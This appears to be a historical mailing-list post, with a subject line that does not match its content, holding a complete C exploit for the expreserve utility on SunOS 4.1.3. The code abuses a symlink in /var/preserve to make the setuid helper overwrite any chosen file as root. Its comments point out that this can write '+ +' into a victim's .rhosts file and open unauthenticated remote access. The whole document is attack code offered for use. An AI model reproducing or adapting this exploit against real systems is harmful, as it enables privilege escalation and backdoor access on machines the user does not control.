Routing problem - solved

[newsham () uhunix uhcc hawaii edu (Tim Newsham)]

/*
 *  Exploit a security hole in expreserve on sun4.1.3
 *    <program> filename
 *       overwrites filename as root with garbage, chown's to you
 *       (note, a 4.1.1 test overwrote with no chown
 *        the first 4 characters written are "+ +\n"
 *        which can be used to overwrite anyones .rhosts as root)
 *
 *                Tim N.
 */

#include <pwd.h>
#include <fcntl.h>

#define HBLKS 2
#define FNSIZE 128
#define BLKS   900

typedef struct {
  time_t time;
  int uid;
  int flines;
  char name[FNSIZE];
  short Blocks[BLKS];
  short encrypted;
} header;


main(argc,argv)
int argc;
char **argv;
{
  int p,u;
  header H;
  struct passwd *pw;
  char buf[100],*dest;

  if(argc!=2) {
    printf("usage: %s destination\n",argv[0]);
    exit(1);
  }
  dest = argv[1];
  p = getpid();
  pw = getpwuid(getuid());
  sprintf(buf,"/var/preserve/%s/Exaaa%.5d",pw->pw_name,p);
  symlink(dest,buf);
  close(0);
  if(open("./Ex",O_RDWR|O_CREAT,0666)<0)  {
    printf("Cant open Ex (temp file)\n");
    exit(2);
  }
/* fill out header so that expre thinks its legit */
  H.time = 12345;    /* who cares */
  strcpy(&H.time,"+ +\n");    /* its a long, we got some free bytes in there*/
  strcpy(H.name,"NoName");
  H.flines = 0;
  H.uid = getuid();
  H.Blocks[0] = HBLKS;
  H.Blocks[1] = HBLKS+1;
  write(0,&H,sizeof(H));
  lseek(0,0,0);
  printf("Made temp file 'Ex'.  You can remove it when done.\n");
  execl("/usr/lib/expreserve","expreserve",0);
  printf("Couldnt exec!\n"); 
}